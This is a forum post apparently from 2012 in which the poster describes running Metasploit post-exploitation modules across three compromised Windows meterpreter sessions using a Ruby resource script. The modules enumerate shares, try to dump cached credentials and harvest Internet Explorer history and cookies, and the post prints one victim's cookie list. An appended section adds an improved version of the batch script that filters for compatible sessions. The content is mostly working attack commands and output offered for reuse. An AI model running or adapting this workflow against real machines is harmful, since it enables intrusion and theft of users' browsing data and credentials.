Metasploit: run all post

Posted 2012-10-3 19:59:43
I just got system privileges on three Windows zombie hosts via the DIR overflow.

  msf > sessions
  Active sessions
  ===============
  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  WWW-H5RID0XUR86\Administrator @ WWW-H5RID0XUR86  192.1.1.1:4444 -> 192.1.1.131:1063
  3   meterpreter x86/win32  DIS9TEAM-B39270\Administrator @ DIS9TEAM-B39270  192.1.1.1:4444 -> 192.1.1.130:1159
  4   meterpreter x86/win32  DIS9TEAM-4BBAD8\Administrator @ DIS9TEAM-4BBAD8  192.1.1.1:4444 -> 192.1.1.132:1659
  msf >

Now I want to check the shares on these three hosts. Let's use the script written by mubix.

  msf > use post/windows/gather/enum_shares
  msf  post(enum_shares) > resource /tmp/all.rc
  [*] Processing /tmp/all.rc for ERB directives.
  [*] resource (/tmp/all.rc)> Ruby Code (185 bytes)
  SESSION => 2
  [*] Running post/windows/gather/enum_shares against session 2
  [*] Running against session 2
  [*] No shares were found
  [*] Post module execution completed
  SESSION => 3
  [*] Running post/windows/gather/enum_shares against session 3
  [*] Running against session 3
  [*] No shares were found
  [*] Post module execution completed
  SESSION => 4
  [*] Running post/windows/gather/enum_shares against session 4
  [*] Running against session 4
  [*] No shares were found
  [*] Post module execution completed
  msf  post(enum_shares) >

Hmm, annoyingly none of them have shares enabled. Let's steal their IE form data~

  msf  post(enum_shares) > use post/windows/gather/cachedump
  msf  post(cachedump) > resource /tmp/all.rc
  [*] Processing /tmp/all.rc for ERB directives.
  [*] resource (/tmp/all.rc)> Ruby Code (185 bytes)
  SESSION => 2
  [*] Running post/windows/gather/cachedump against session 2
  [*] Executing module against WWW-H5RID0XUR86
  [-] System is not joined to a domain, exiting..
  [*] Post module execution completed
  SESSION => 3
  [*] Running post/windows/gather/cachedump against session 3
  [*] Executing module against DIS9TEAM-B39270
  [-] System is not joined to a domain, exiting..
  [*] Post module execution completed
  SESSION => 4
  [*] Running post/windows/gather/cachedump against session 4
  [*] Executing module against DIS9TEAM-4BBAD8
  [-] System is not joined to a domain, exiting..
  [*] Post module execution completed
  msf  post(cachedump) > use /post/windows/gather/enum_ie
  [-] Failed to load module: /post/windows/gather/enum_ie
  msf  post(cachedump) > use post/windows/gather/enum_ie
  msf  post(enum_ie) > resource /tmp/all.rc
  [*] Processing /tmp/all.rc for ERB directives.
  [*] resource (/tmp/all.rc)> Ruby Code (185 bytes)
  SESSION => 2
  [*] Running post/windows/gather/enum_ie against session 2
  [*] IE Version: 6.0.3790.0
  [-] This module will only extract credentials for >= IE7
  [*] Retrieving history.....
  File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
  [*] Retrieving cookies.....
  File: C:\Documents and Settings\Administrator\Cookies\index.dat
  [*] Looping through history to find autocomplete data....
  [-] No autocomplete entries found in registry
  [*] Looking in the Credential Store for HTTP Authentication Creds...
  [*] Writing history to loot...
  [*] Data saved in: /home/brk/.msf4/loot/20120112200304_default_192.1.1.131_ie.history_301779.txt
  [*] Post module execution completed
  SESSION => 3
  [*] Running post/windows/gather/enum_ie against session 3
  [*] IE Version: 6.0.2900.2180
  [-] This module will only extract credentials for >= IE7
  [*] Retrieving history.....
  File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
  [*] Retrieving cookies.....
  File: C:\Documents and Settings\Administrator\Cookies\index.dat
  [*] Looping through history to find autocomplete data....
  [-] No autocomplete entries found in registry
  [*] Looking in the Credential Store for HTTP Authentication Creds...
  [*] Writing history to loot...
  [*] Data saved in: /home/brk/.msf4/loot/20120112200318_default_192.1.1.130_ie.history_534757.txt
  [*] Writing cookies to loot...
  [*] Data saved in: /home/brk/.msf4/loot/20120112200318_default_192.1.1.130_ie.cookies_512182.txt
  [*] Post module execution completed
  SESSION => 4
  [*] Running post/windows/gather/enum_ie against session 4
  [*] IE Version: 6.0.2900.5512
  [-] This module will only extract credentials for >= IE7
  [*] Retrieving history.....
  File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
  [*] Retrieving cookies.....
  File: C:\Documents and Settings\Administrator\Cookies\index.dat
  [*] Looping through history to find autocomplete data....
  [-] No autocomplete entries found in registry
  [*] Looking in the Credential Store for HTTP Authentication Creds...
  [*] Writing history to loot...
  [*] Data saved in: /home/brk/.msf4/loot/20120112200333_default_192.1.1.132_ie.history_580511.txt
  [*] Writing cookies to loot...
  [*] Data saved in: /home/brk/.msf4/loot/20120112200333_default_192.1.1.132_ie.cookies_443815.txt
  [*] Post module execution completed
  msf  post(enum_ie) >

OK, let's have a look at the results:

  brk@Dis9Team:~/.msf4/loot$ ls
  20120112200304_default_192.1.1.131_ie.history_301779.txt
  20120112200318_default_192.1.1.130_ie.cookies_512182.txt
  20120112200318_default_192.1.1.130_ie.history_534757.txt
  20120112200333_default_192.1.1.132_ie.cookies_443815.txt
  20120112200333_default_192.1.1.132_ie.history_580511.txt
  brk@Dis9Team:~/.msf4/loot$ cat 20120112200333_default_192.1.1.132_ie.cookies_443815.txt
  Cookies data
  ============
  Date Modified              Date Accessed              Url
  -------------              -------------              ---
  2012-01-10T04:45:35+00:00  2012-01-10T04:45:35+00:00  administrator@dvd-x-player.com/
  2012-01-11T16:27:31+00:00  2012-01-11T16:30:02+00:00  administrator@726.com/
  2012-01-11T16:27:54+00:00  2012-01-11T16:27:54+00:00  administrator@www.xmqdh3.com/
  2012-01-11T16:28:39+00:00  2012-01-11T16:31:04+00:00  administrator@adobe.com/
  2012-01-11T16:29:41+00:00  2012-01-11T16:29:41+00:00  administrator@www.dqsdh.us/
  2012-01-11T16:29:56+00:00  2012-01-11T16:29:56+00:00  administrator@778669.com/
  2012-01-11T16:29:56+00:00  2012-01-11T16:29:56+00:00  administrator@t.jiuyaoyouxi.com/
  2012-01-11T16:29:56+00:00  2012-01-11T16:29:56+00:00  administrator@u484012.778669.com/
  2012-01-11T16:30:04+00:00  2012-01-11T16:30:04+00:00  administrator@www.726.com/
  2012-01-11T16:30:20+00:00  2012-01-11T16:30:20+00:00  administrator@www.mzdh3.com/
  2012-01-11T16:31:07+00:00  2012-01-11T16:31:07+00:00  administrator@adobe.com/cfusion/
  2012-01-11T16:31:17+00:00  2012-01-11T16:31:17+00:00  administrator@zqgame.com/kz2/kzlm1/
  2012-01-11T16:31:28+00:00  2012-01-12T11:50:29+00:00  administrator@google.com/
  2012-01-11T16:32:43+00:00  2012-01-11T16:36:59+00:00  administrator@buffer-ad.qvod.com/
  2012-01-11T16:37:05+00:00  2012-01-11T16:37:05+00:00  administrator@www.av123123.info/
  2012-01-11T16:37:20+00:00  2012-01-11T16:37:20+00:00  administrator@code.7794.com/page/
  2012-01-11T16:37:29+00:00  2012-01-11T16:37:29+00:00  administrator@www.977ai.com/
  2012-01-11T16:38:52+00:00  2012-01-11T16:38:52+00:00  administrator@web.kuaiwan.com/
  2012-01-11T16:39:06+00:00  2012-01-11T16:39:06+00:00  administrator@virtov.com/
  2012-01-11T16:39:52+00:00  2012-01-12T04:29:43+00:00  administrator@scorecardresearch.com/
  2012-01-11T16:39:55+00:00  2012-01-11T16:39:55+00:00  administrator@stat.youku.com/player/
  2012-01-11T16:40:00+00:00  2012-01-11T16:40:00+00:00  administrator@youku.com/
  2012-01-12T04:29:36+00:00  2012-01-12T04:29:36+00:00  administrator@doubleclick.net/
  2012-01-12T04:30:14+00:00  2012-01-12T04:30:14+00:00  administrator@sourceforge.net/
  2012-01-12T11:33:14+00:00  2012-01-12T11:50:33+00:00  administrator@google.com.hk/
  brk@Dis9Team:~/.msf4/loot$

The all.rc file contents:

  <ruby>
  # Walk every session id the framework currently holds
  framework.sessions.each_key do |session|
    # Point the currently selected post module at this session
    run_single("set SESSION #{session}")
    print_status("Running #{active_module.fullname} against session #{session}")
    # Execute the module, then pause briefly before moving to the next session
    run_single("run")
    sleep 1
  end
  </ruby>




Only after playing a thousand tunes does one understand music; only after seeing a thousand swords does one know a blade.
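The all.rc above feeds every session in the framework to the active module, whatever kind of session it is; a plain shell session or a Linux meterpreter in the list would make a windows/gather module fail part-way through the loop. The script below is an added example, not the original poster's all.rc and not Metasploit's own code: the same loop with a compatibility filter in front of it. The helper names (`platform_matches?`, `select_sessions`, `commands_for`, `run_against_all`) and the sample session table are assumptions made here. Inside msfconsole it relies on the console-provided `framework`, `active_module`, `run_single` and `print_status`, and assumes session objects answer `type` ("meterpreter" or "shell") and, where present, `platform`. Metasploit post modules also expose `compatible_sessions`, which does the authoritative check against the module's declared Platform and SessionTypes; the path-based heuristic here only stands in for it so the script can be exercised offline.

```ruby
# Added example (not the original poster's all.rc, not Metasploit code):
# run the active post module against every *compatible* session.
#
# In msfconsole, save the body between <ruby> and </ruby> tags and load it with
#   resource /tmp/all_checked.rc
# The console provides `framework`, `active_module`, `run_single` and
# `print_status` (assumed here, as in the original all.rc). Run with plain
# `ruby`, the script falls back to a constructed session table instead.

# Map the OS component of a module path ("post/windows/...") onto the platform
# string a session reports. Newer Metasploit reports "windows"/"linux"; the 2012
# console on this page shows "x86/win32", so win32/win64 are accepted as Windows.
def platform_matches?(target_os, platform)
  plat = platform.to_s.downcase
  return true if target_os == 'multi'
  return true if plat.include?(target_os)
  target_os == 'windows' && (plat.include?('win32') || plat.include?('win64'))
end

# Pick the session ids a post module should be run against.
# Only meterpreter sessions are accepted unless allow_shell is set, because the
# gather modules on this page need the meterpreter API (registry, filesystem).
# `sessions` is a hash of id => { type:, platform: }.
def select_sessions(module_fullname, sessions, allow_shell: false)
  parts = module_fullname.split('/')
  target_os = parts.length >= 2 ? parts[1] : 'multi'
  sessions.select do |_id, s|
    type_ok = s[:type] == 'meterpreter' || (allow_shell && s[:type] == 'shell')
    type_ok && platform_matches?(target_os, s[:platform])
  end.keys.sort
end

# The two console commands the original all.rc issues per session, kept
# together so SESSION is never left pointing at the wrong target.
def commands_for(session_id)
  ["set SESSION #{session_id}", 'run']
end

# Run the module against every selected session. `runner` is called with each
# command string (run_single in msfconsole, a recorder when run offline).
# Returns which ids were used and which were skipped as incompatible.
def run_against_all(module_fullname, sessions, runner, allow_shell: false, pause: 0)
  ids = select_sessions(module_fullname, sessions, allow_shell: allow_shell)
  ids.each do |id|
    commands_for(id).each { |cmd| runner.call(cmd) }
    sleep(pause) if pause > 0
  end
  { ran: ids, skipped: sessions.keys.sort - ids }
end

if defined?(framework) && defined?(active_module) && active_module
  # Inside msfconsole: build the table from live sessions and run for real.
  # Assumption: sessions answer #type; #platform is only read where defined.
  table = {}
  framework.sessions.each_pair do |id, sess|
    plat = sess.respond_to?(:platform) ? sess.platform : nil
    table[id] = { type: sess.type.to_s, platform: plat }
  end
  result = run_against_all(active_module.fullname, table,
                           ->(cmd) { run_single(cmd) }, pause: 1)
  print_status("#{active_module.fullname}: ran against #{result[:ran].inspect}, " \
               "skipped #{result[:skipped].inspect}")
else
  # Constructed sample table (not real sessions): the three Windows meterpreter
  # sessions from the post, plus a Linux meterpreter and a plain command shell.
  SAMPLE_SESSIONS = {
    2 => { type: 'meterpreter', platform: 'x86/win32' },
    3 => { type: 'meterpreter', platform: 'x86/win32' },
    4 => { type: 'meterpreter', platform: 'windows' },
    5 => { type: 'meterpreter', platform: 'linux' },
    6 => { type: 'shell',       platform: 'windows' },
  }.freeze

  if __FILE__ == $PROGRAM_NAME
    log = []
    r = run_against_all('post/windows/gather/enum_shares', SAMPLE_SESSIONS,
                        ->(cmd) { log << cmd })
    puts "would run against sessions #{r[:ran].inspect}, skip #{r[:skipped].inspect}"
    puts log
  end
end
```

Usage is the same as the original: `use` the post module first, then `resource /tmp/all_checked.rc`, with the Ruby wrapped in `<ruby>` ... `</ruby>` so msfconsole evaluates it instead of treating each line as a console command. Run directly with `ruby`, the offline branch shows that for a windows/gather module only the three Windows meterpreter sessions are selected and the Linux meterpreter and the shell are reported as skipped.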

Powered by Discuz! X2
